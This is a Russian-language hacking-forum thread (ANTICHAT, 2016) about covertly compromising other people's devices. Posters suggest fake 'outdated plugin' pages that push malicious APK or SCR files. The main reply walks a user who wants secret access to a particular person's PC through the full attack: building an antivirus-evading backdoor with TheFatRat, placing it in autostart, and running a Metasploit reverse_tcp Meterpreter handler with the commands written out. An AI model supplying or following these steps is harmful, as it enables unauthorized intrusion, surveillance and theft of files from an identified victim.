ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

18.09.2016, 23:12
|
|
Guest
Провел на форуме: 939
|
|
Сообщение от Matcal Koushek
Matcal Koushek said:
↑
Между настройками компьютера и скидывания файлов действительно разница есть.
Но, откуда вы взяли, что первое сложно, а второе чепуха?
Я не ворчу, я просто много лет хочу понять, из каких источников люди черпают такую инфу?
Где вы прочитали это? Если дадите ссылку, ещё одна загадка для меня будет решена.
ахах))) та не)) это стереотипы мои)))) хотелось бы осилить это, но где взять источники с подробной информацией?
|
|
|
|

21.09.2016, 18:57
|
|
Новичок
Провел на форуме: 40951
|
|
Сообщение от trolex
trolex said:
↑
ага, по статистике
http://www.liveinternet.ru/stat/ru/oses.html
компы 40% трафика, мобильные 60%, из них андроид 46%,
как заставить человека установить своё приложение?
вижу вариант с той же фоткой, при переходе по адресу фотки, выдаётся сообщение, ваш браузер устарел, обновите плагин / флэшплеер и ссылка на apk,
при загрузке ссылки на фото можно определять ОС устройства, если WIN - выдавать scr на скачку, если андроид - выдавать страницу с устаревшим плагином
Хэх, с андройдом дела обстойхат намного круче. Много андройд устройств базируются на старх версиях с уязвимой начинкой. В метасплойте очень много прибомбасов для скрытойх установки АПК ))))
|
|
|

21.11.2016, 16:33
|
|
Guest
Провел на форуме: 2776
|
|
Сообщение от Ruslan5
Ruslan5 said:
↑
Мне нужно создать удаленный доступ к компьютеру через интернет, управлять компом не обязательно и менять там тоже ничего не надо, и так чтоб владелец не знал. Точнее нужно всего лишь скинуть файлы с его компа. Есть только ссылка в соцсети, также знаю, что пользователь любит играть в игры всякие в вк (не знаю поможет это или нет) и фактический адрес проживания. ip адрес не знаю.
В общем нужен грамотный вариант как это сделать и не палится...
|+| Чтобы контролить комп надо знать (основу) как устроена сеть . Дальше нужно выбрать Дистрибутив линукса и изучить его ( для таких целей посоветаю : https://backbox.org/).
|+| Изучить Metasploit (если трудно -> скачайте TheFatRat: https://github.com/Screetsec/TheFatRat) - немного проще , однако нужно попрактиковаться .
|+| Вам надо изучить: как устроен Backdoor, как обойти защиту вирусов ( используй virustotal для проверки -> чтобы антивирусник не начал паниковать).
|+| Заходите в TheFatRat папку :
root@kali~:/Test/TheFatRat# chmod +x powerfull.sh
chmod +x fatrat
./fatrat
|+| Выбор : 2 CREATE FUD BACKDOOR (SLOW BUT POWERFULL)
ifconfig ------------------ > SET LHOST IP: 192.168.1.5
SET LPORT: 8080
|+| Дальше перейдите в папку TheFatRat и найдите папку output (Там будет ваш backdoor -> Powerfull.exe). Теперь надо закинуть файл на компьютер (лучше помести в автозагрузку).
После этого :
root# /etc/init.d/postgresql start
msfconsole
------------------------------------------------------------------------------------
msf > use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.5
set LPORT 8080
exploit
------------------------------------------------------------------------------------
meterpreter > help
sysinfo
screenshot
ipconfig
Выбирайте нужную функцию и действуйте ).
Советаю вам изучить ещё утилиту
Social Engineering Toolkit.
Желаю Успехов !
|
|
|
|
|
 |
|
|